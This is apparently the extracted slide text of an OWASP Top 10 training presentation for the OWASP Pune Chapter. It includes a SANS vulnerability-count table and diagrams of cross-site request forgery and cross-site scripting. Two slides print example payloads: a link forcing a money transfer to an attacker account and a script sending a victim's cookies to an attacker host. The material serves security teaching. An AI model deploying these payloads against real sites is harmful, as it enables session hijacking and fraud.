Mais conteúdo relacionado
Semelhante a Owasp Top 10 - Owasp Pune Chapter - January 2008 (20)
Owasp Top 10 - Owasp Pune Chapter - January 2008
- 2. SANS @RISK December 2007 3 Dec 10 Dec 17 Dec 24 Dec 31 Dec Total Microsoft Products 2 3 12 0 2 19 Mac 2 2 2 4 0 10 Linux 10 5 8 11 0 34 Unix, Solaris, etc 5 3 3 4 1 16 Network Device 1 3 1 1 1 7 Others ( various ) 31 33 30 37 16 147 Web Applications 70 34 52 35 52 243
- 25. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Sends an email containing malicious href tag. Click Here Transfer Money <a href= http://www.bank.com/transfer.php?acc=attacker&amount=$10000 > 1 2 3 4 5 6 7
- 41. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Click Here Stolen Cookies 1 2 3 4 5 6 7 Sends malicious request <script>document. location=“http://attacker/steal_cookies.php?cookies=“+document. cookie</script>
- 81. login.asp authenticate.asp login.asp Redirect request logoff homepage.asp homepage.asp Client Server GET www.abc.com www.abc.com/login.asp POST username + password Redirect : www.abc.com/homepage.asp GET www.abc.com/homepage.asp www.abc.com/homepage.asp